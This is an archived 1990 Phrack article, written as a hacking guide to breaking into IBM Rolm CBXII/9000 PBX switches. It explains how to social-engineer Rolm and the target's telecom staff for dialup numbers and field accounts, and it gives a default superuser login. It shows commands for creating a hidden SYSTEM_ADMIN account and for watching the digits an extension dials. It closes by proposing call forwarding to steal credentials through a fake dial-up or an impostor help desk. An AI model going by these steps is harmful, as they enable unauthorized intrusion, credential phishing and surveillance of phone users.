💾 Archived View for aphrack.org › issues › phrack31 › 3.gmi captured on 2021-12-03 at 14:04:38. Gemini links have been rewritten to link to archived content

View Raw

More Information

-=-=-=-=-=-=-

                             ===Phrack Inc.===
               Volume Three, Issue Thirty-one, Phile #3 of 10
              /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
             / *                                            * \
             \                                                /
             /           Hacking Rolm's CBXII/9000            \
             \                by DH                  /
             /                   05/24/90                     \
             \ *                                            * /
              \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/

Introduction
------------
     IBM Rolm's CBXII/9000 is a very powerful machine.  Powerful in the aspect
that one has the switch(s) at his control.  Controling switches means you can
control the entire PBX environment (And it's users).
     This file will not get technical.  Basically, I'm writing this file on
the HOW-TO's of the internal works of CBXII and the basics of obtaining the
dialups and account information need to access the machines.  For further
information on CBX's in general, read Epsilon's Phrack Phile on them, or
consult Evil Jay's phile on OSL's.

Obtaining Dialups
--------- -------
      Obtaining dialups unfortunately is the hardest part of hacking CBXII's.
(Yes, even harder than hacking them).  There are several ways to obtain the
dialups.  I would say a good bit of CBX's are at universities and hospitals
where they own their own switches.  Most of the time you can determine if they
have one by calling the Telecommunications Department of the target location.
Or, another way is to check with ROLM.  If you *KNOW* that a target location
has a CBXxx machine, you can call ROLM's 800 wats line and say your with the
Telecommunications Department and your looking for the DIALUP.  Rolm has files
on all their CBXxx's and the Dialups also.  They might ask you for a NODE #
for the dialup, and you should usually respond with what node you want (Since
different nodes handle different areas of the PBX).  Basically, nodes start at
ONE and usually goto THREE or FOUR, depending on the size of the PBX.
       CBXxx's are greatly compatible of IBM Rolm's Phone-Mail system (Which
is a highly used and common voice mail system).  This of course doesn't mean
that every PHM (Phone-Mail) system has a CBXxx attached.  But it is generally
a good start.
       The following is a checklist to determine if the target location could
have a CBXxx for controlling their switch.  By no means however, if your target
location has all of the following it could have a CBXxx.
        1) Does the location handle it's own switch?
            If so, what kind, and who services it.
        2) Does IBM Rolm handle any aspect of their telecommunications
           department?
            If so, this is a possible CBXxx location.
        3) Does the location have Rolm Phone-Mail?
        These three guidelines are not requirements.  I.E. -- The location
could have a non-IBM PBX but still have a CBXxx for handling the switch.
So who knows.. It's up to you and your bullshitting and scans.
Hacking the CBXxx's
------- --- -------
        Well, once you have obtained the dial-ups, you are almost halfway
there.  Hacking the CBX is the easy part.  1st off, IBM Rolm ships *ALL*
of their machines with a default account (Yes, and they never change it).
When the destination of the CBX recieves the machine, they use the default
to create other accounts for employees, PBX operators, and administration.
Rolm IBM also has a field support account embedded in the machine.  These
are different to each location and correspond to the serial number of the
machine (Rolm's accounts can be obtained from Rolm's 800 technical support
line).  So, now that we know that there is a default account that telecom
department uses to setup the other accounts after they recieve the machine,
tells us that this is a priviledge account.  And it is.
         USERNAME: SU
         PASSWORD: SUPER
        How nice for them to give us such power.  Yes, it's a basic default
with SuperUser priviledge.  If for some reason the account default has been
changed, their are other ways of getting in:
         1) Call Rolm and get the Field account information.
         2) Try first names of Telecom Dept. employees, and PBX Operators.
         3) Use every Hacking skills you have (If any).
        Some older versions of CBX don't even require logging in with an
account.  Those versions are less responsive to the administrators needs,
but can be useful to one also.  Don't be discouraged if the SU password is
changed, just call Rolm and get the field account.
        The following is the matrix before one access the machine. *Note that
it clearly identifies* *Also: Accessible at 300 baud and e,7,1*
CONNECT                                ID banner
                 _Release version #  /
                /                   /\
Rolm CBXII  RELEASE 9004.0.65 RB74UCLA11956
BIND DATE: 8/SEP/88                 \
YOU HAVE ENTERED NODE 1, CPU 2       \_Name of owner, IE: UCLA
11:14:30 ON FRIDAY 2/11/1990             (System ID)
USERNAME: xxx
PASSWORD: xxx
INVALID USERNAME-PASSWORD PAIR.

Once your in
---- ---- --
         Once your in, you should have no problems wondering around the
machine and using the utilities in the machine's operating system.  There is
very specific help functions inside the machine that will guide you through
with no problems.  At the CBX prompt:
%. HELP ?
or
%. ?
          Should produce a valid listing of options and sub-functions.  Every
function can be followed with a '?' to give lists of valid sub-functions under
that function or how the syntax of that function should be used.
          The following is a listing of commands for CBXII/9000:
ABORT              ACTIVATE            ATTR                BYE
CANCEL             CARD                CDRSM               CDT
CHANGE             CHG                 CLEAR               CLR
CMPCT              CMSTS               CNCL                CNFG
CONVERT            COPY                CPEG                CTMON
CTRA               CTRTL               CXCLR               COPY
CXCLR              CXCON               CXNET               DACK
DADD               DAEVT               DANS                DBDMP
DCAT               DCF                 DCOM                DDMA
DDQ                DDT                 DE                  DEACTIVATE
DEFINE             DELETE              DEMOUNT             DESUM
DEX                DFACK               DFCOM               DFEAT
DFEVT              DHTQ                DHWS                DIAG
DIQ                DISABLE             DIWQ                DKQ
DML                DMNT                DMS                 DMTST
DOWN               DPATR               DPMR                DPMS
DPPRI              DPTR                DQQ                 DRCT
DREGS              DSBLE               DSQ                 DSST
DSTAK              DTCB                DTDQ                DWQ
DX_TR              ENABLE              ENB                 ENBLE
ETIO               EX                  EXM                 EXN
EXP                EXPAND              FINIT               FORMAT
FREER              FSD                 GTOD                HDBST
HELP               INSTALL             KPFA                LCT
LIST               LOAD                LOGOFF              LOGON
LPEG               LPKT                LSCT                LSL
LST                LTCB                MNT                 MONITOR
MOUNT              MTRACE              NEXT                NSTAT
PAGE               PCNFG               PDIO                PFA
PKTS               PLIST               PLTT                PPFA
PS                 PSH                 QAT                 QITM
QTEST              RCT                 RECEIVE             RENAME
REPLY              RESTART             RESTORE             REVERSE
RM                 RMOFF               RPFA                RSC
RSCLK              RSTOR               RSTRT               SAT
SCAN               SEND                SET                 SHOW
SITM               SOCON               SOUNC               SSAT
START              STATE               STATUS              STEST
STOD               STOP                STRT                STS
TDCD               TEST                TKSTS               TRTL
TST                TX                  UNLK                UNLOCK
UP                 VERIFY              XDEF                XMIT
XPND
     These commands can be executed from and '% ' prompt.  If the command is
followed by a '?', more information will be supplied about the command.
Using the ICI
----- --- ---
     The Interactive Configuration Interface controls immediate changes in
the switch and PBX environment.  The Utility is explained in great detail
through the actual running of it.  You can access the ICI by typing:
% CNFG
                       CBXII/9000
        INTERACTIVE  CONFIGURATION INTERFACE
                         CPU 2
15:14:32 ON FRIDAY 5/02/1990
COMMAND:
      This is the main command prompt.  From here you can exercise the '?'
help list to get valid commands.  There are four phases of the ICI utility:
Modify, Create, List, and Delete.  These can be used on Extentions, Trunks,
Logon accounts, Feature Group sequences, Data_line access, Trunk Groups, ect.
The following is a sample of using 'list' to list a current extention in the
PBX:
                               _Forward to EXTN 2000
COMMAND: LIST EXT 4038        /                            _Outside number
                             /             FORWARD ON     /  to forward to
                           FORWARDING     BSY RNA DND    /
   EXTN     TYPE   COS   TARGET1 TARGET2  I E I E I E RINGDOWN  NAME
   ----     ----   ---   ------- -------  - - - - - - --------  ----------
DS 4038     EXTN   56    2000             1 1 1 1 1 1 95551212  R.STABELL
    \          \    \                     /   /    \               \
    Extention  /     -Class of service   if  R    Auto. Forward   Owner of
              --Type of line            BUSY  I   No Matter What   EXTN.
                (Reg. Extention)               N
                                                G
Note: The 1's specifies to forward to target#1    & NO ANSWER
      (As 2's would mean forward to #2 target)
     This should detail how to modify a listing like above using the 'MODIFY'
command in the ICI.  Once modified, all transactions are processed immediately.
Using the 'Delete' command one can delete extentions, trunks, ect.
     So now we have the following commands in ICI: MODIFY, DELETE, LIST, CREATE.
Each can be used with the following "Nouns" to modify that "Noun":
BUTTON_120         BUTTON_240          CDR_EXCLUDE         CNFG_ERRORS
CNFG_QUEUE         CNFG_STATUS         CNFG_USERS          COM_GROUP
COS_FEAT           DATA_ACCESS         DATA_DEVICE         DATA_GROUP
DATA_LINE          DATA_SUBMUX         DLI                 ETS
EXTEN              FAC                 FAC_TYPE            FAMILY
FEAT_CODE          FIRST_DIGIT         HD_GROUP            LEX
LOGON_PROFILE      MAP                 MEM_PARTS           PARAM
PICK               POWER               Q_TYPE              ROUTE_LIST
RP                 RPD                 RPI                 RPS_120S_ON
RPS_240S_ON        SAT_NAME            SEARCH_SEQ          SECTION
SECURITY_GROUP     SERVICE_LIST        SIO_PARTS           SLI
SPEED              T1D3                T1D3_GRP            TRUNK
TRUNK_GROUP        VPC
      The FAMILY, LOGON_PROFILE, and CNFG_USER all deal with the accounts on
the system.  One can use MODFIY or CREATE to set them up an account with SU
access.  The FAMILY noun is the listing of the groups with different access,
to different "nouns" available. I.E.: Not everyone can access the CHANGE
LOGON_PROFILE to create an account.
      To create an account with SU access, type (while in ICI):
% CREATE LOGON_PROFILE
ENTER NAME (1-12 CHAR): TEST
ENTER PASSWORD: TEST
RETYPE: TEST
      Next it will ask you for a family.  For SU access, type "SYSTEM_ADMIN".
After family, the machine should prompt you for a "verb". Verbs are the actual
functions or commands, so in this environment you can set the commands a user
can access.  So, for SU, enter "ALL" for every command access.
      To get a valid listing of users online, try this:
% LIST CNFG_USERS
NUMBER OF USERS    MAX NUMBER OF USERS
     3                  5
PORT    USER_NAME    START_TIME  HOW_LONG
17      SU           17:47:57    0:28:34
2       FIELD        18:16:03    0:0:28
3       MARYB        18:16:03    0:10:03

Using the Monitoring Utility
----- --- ---------- -------
      This command is one of the more powerful commands in the CBXxx system.
The monitor command should be invoked from within the main function command
level and not in the ICI level.  The monitoring command allows you to actually
watch or monitor TRUNKS and EXTENTIONS.  So, if I were to type:
% MONITOR EXT 4038
10:02:43 ON FRIDAY MAY/02/1990
EXT#   STATE            DI  CODE  DIGITS         PROCESS      STATUS
----   ---------------  --  ----  -------------  ------------ ------
4038   IDLE                                      STN FWD NUM   FWD
 \         \                                     /    /    /    \
Extention   Not in use                   Standard     \   /        Forwarded
                                         Extention     \ /
                                                    Forwarded to
                                                     a number
      This shows the extention to be IDLE and not in use.  But, with forwarded
call processes to a standard number.  You would have to use ICI to look up the
number it's forwarded to if you wanted.
% MONITOR EXT 4038
10:03:44 ON FRIDAY MAY/11/1990
EXT#    STATE           DI  CODE  DIGITS         PROCESS     STATUS
----    --------------  --  ----  -------------  ----------- ------
4038    DIAL TONE                                STN FWD NUM  FWD
4038    DIALING         Y         9             /    \   \     \
4038    DIALING         Y         92           S     F    N     \Extention
4038    DIALING         Y         923           t     o    u       Forwarded
4038    DIALING         Y         9233           a N   r    m
4038    DIALING         Y         92334           n u   w    b
4038    DIALING         Y         923345           d m   a    e
4038    DIALING         Y         9233456           a b   r    r
4038    DIALING         Y         92334564           r e   d
4038    CONN T025N      N              \              d r   e
 /             \        /               \                    d
 \              \       \_Dialing NO     \_Number dialed
  \_Extention    \
               Connected to
              Outside trunk T025N
     This monitoring shows the extention actually dialing the number, and then
connecting to an outside truck.  Unfortunatley, one we cannot monitor without
access to a bell switch.
     Monitoring can also be done with trunks.  I will not display any trunk
monitoring since it is quite simple to decypher.
Manipulating the switch
------------ --- ------
     There are many ways you can manipulate the CBX's to gain accounting
information on data lines within the PBX environment.  One sure-fire method
would be to forward an actual data dial-up extention to a bridge or loop and
then write an emulation to intercept the user's account information real-time
as they connect to your fake dial-up.
     Or perhaps if an university uses the CBX, one could maybe forward the
computer help desk extention to a bridge or loop and as an unsuspecting user
calls up, ask him what machine and account info he has access to for a help
log sheet you are taking.
    Who cares. Who knows.  There are thousands of things you can do to use
the CBX to your advantage.  Hell, you have the whole switch at your command.
DH -  05/11/90

_______________________________________________________________________________